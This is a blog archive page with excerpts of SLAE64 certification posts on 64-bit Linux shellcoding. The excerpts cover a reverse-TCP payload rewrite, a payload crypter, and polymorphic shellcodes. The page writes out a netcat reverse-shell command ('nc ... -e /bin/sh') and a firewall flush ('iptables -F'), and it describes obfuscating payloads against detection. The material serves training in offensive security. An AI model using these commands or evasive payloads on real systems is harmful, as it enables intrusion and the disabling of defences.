Posts

Showing posts from March, 2017

SLAE64 Review

This is my review for the 64 bit edition of the SecurityTube Linux Assembly Expert course and certification exam. http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html

I found out about the SecurityTube bootcamp series of videos while reviewing several blog posts about the OSCP certification. I did the Assembly Language Primer For Hackers video series while attempting to follow along on my 64 bit version of Kali Linux. Then I moved on to the Buffer Overflow Primer video series. I was finding it a bit difficult to complete some of the exploit examples on my 64 bit Kali. After completing the Buffer Overflow Primer I was longing for more. Then I bumped into an advertisement for the SecurityTube Linux Assembly Expert course and while reviewing that I discovered that there was a 64 bit edition. I watched a couple of the sample videos and realized that this was exactly what I was missing. Vivek Ramachandran does an excellent job of exp

PolyRevTcp1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification. http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE64-1434
Target Operating System: 64 bit Linux (x86_64 GNU/Linux)
Original Shellcode: Metasploit's linux/x64/shell/reverse_tcp
Original number of bytes: 68
Original number of nulls: 3
GitHub Link: https://github.com/rtaylor777/nasm/blob/master/PolyRevTcp1434.nasm
My version:
Number of bytes = 65
Number of nulls = 0
PolyRevTcp1434.nasm

Intro

When I studied the Metasploit payload linux/x64/shell/reverse_tcp I could see that there was opportunity to reduce its size. Furthermore it had nulls in it, which quite probably means that it would need to be encoded, which would further increase its size. So I thought I would take a stab at reducing its size and removing the nulls.

Testing

Download: wget https://raw.githubusercontent.

Assignment 7

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification. http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE64-1434
Target Operating System: 64 bit Linux (x86_64 GNU/Linux)

Assignment 7: Create a custom crypter like the one shown in the "crypters" video. You can use any encryption algorithm. You can use any programming language. But demo the encryption and decryption end to end.

GitHub Link: https://github.com/rtaylor777/nasm/blob/master/Encrypt1434.zip

Intro

For this assignment I decided to use the Python Cryptography Toolkit (pycrypto): https://pypi.python.org/pypi/pycrypto The encryption used is AES and the mode used is AES.MODE_CBC. The password is hashed using SHA256.

Quickstart

Create a directory to extract the files into: Download the Encrypt1434.zip file: wget https://github.com/rtaylor777/nasm/raw/master/Encrypt1434.zi

NetCatRevShell1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification. http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE64-1434
Target Operating System: 64 bit Linux (x86_64 GNU/Linux)
GitHub Link: https://github.com/rtaylor777/nasm/blob/master/NetCatRevShell1434.nasm
Published: https://www.exploit-db.com/exploits/41509/
Number of bytes = 72
Number of nulls = 0
NetCatRevShell1434.nasm

Intro

The NetCatRevShell1434 does an execve system call to run the command: nc 127.0.0.1 1334 -e /bin/sh I came up with this version while doing an assignment to create a polymorphic version of a shellcode that someone else had created which did basically the same thing. As usual when creating a polymorphic version I start out by rewriting the code and making it as small as I can. Then the code invariably increases in size again while I attempt to obfuscate it (make it har

PolyNetCatRevShell1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification. http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE64-1434
Target Operating System: 64 bit Linux (x86_64 GNU/Linux)
This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html
The Original Version: http://shell-storm.org/shellcode/files/shellcode-823.php
Original Size: 109 bytes
My Version:
GitHub Link: https://github.com/rtaylor777/nasm/blob/master/PolyNetCatRevShell1434.nasm
Published: https://www.exploit-db.com/exploits/41510/
My version:
Number of bytes = 106
Number of nulls = 0
PolyNetCatRevShell1434.nasm

Intro

The PolyNetCatRevShell1434 does an execve system call to run the command: nc 127.0.0.1 1334 -e /bin/sh

Polymorphic

This is a polymorphic version of the original author's code which does basically the same thing. I rewrote the

PolyFlushIPTables1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification. http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE64-1434
Target Operating System: 64 bit Linux (x86_64 GNU/Linux)
This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html
The Original Version: http://shell-storm.org/shellcode/files/shellcode-683.php
Original size: 50 bytes (don't believe what he says :)
My Version:
GitHub Link: https://github.com/rtaylor777/nasm/blob/master/PolyFlushIPTables1434.nasm
Published: https://www.exploit-db.com/exploits/41503/
My version:
Number of bytes = 47
Number of nulls = 0
PolyFlushIPTables1434.nasm

Intro

This shellcode basically just executes /sbin/iptables -F without any other parameters. man iptables "-F, --flush [chain]               Flush  the  selected  chain (all the chains in the table if none i

PolySetuidExecve1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification. http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE64-1434
Target Operating System: 64 bit Linux (x86_64 GNU/Linux)
This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html
The Original Version: http://shell-storm.org/shellcode/files/shellcode-77.php
My Version:
GitHub Link: https://github.com/rtaylor777/nasm/blob/master/PolySetuidExecve1434.nasm
Published: https://www.exploit-db.com/exploits/41498/
Original Shellcode bytes = 49
My version:
Number of bytes = 31
Number of nulls = 0
PolySetuidExecve1434.nasm

Intro

This shellcode when executed will first setuid(0) and then execute /bin/sh and provide you with a shell. The purpose of calling setuid(0) is, suppose that you have managed to inject this shellcode into an executable that is Set-UID root. I

Assignment 6

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification. http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE64-1434
Target Operating System: 64 bit Linux (x86_64 GNU/Linux)

Assignment 6: Take up any 3 shellcodes, 64 bit Linux ones, from Shell-Storm and create polymorphic versions which do not exceed 150% of the size of the original shellcode. Bonus points if you make the polymorphic version really obscure or maybe even shorter in length than the original one.

Concerning polymorphic code detection: https://www.fp6-noah.org/publications/papers/nemu_raid07.pdf https://www3.cs.stonybrook.edu/~mikepo/papers/nemu.virology.pdf

I have decided that since these blog posts tend to get rather long that I will create a separate blog post for each of the 3 shellcodes that I will choose from Shell-Storm and I will simply put a link to those blog posts here. T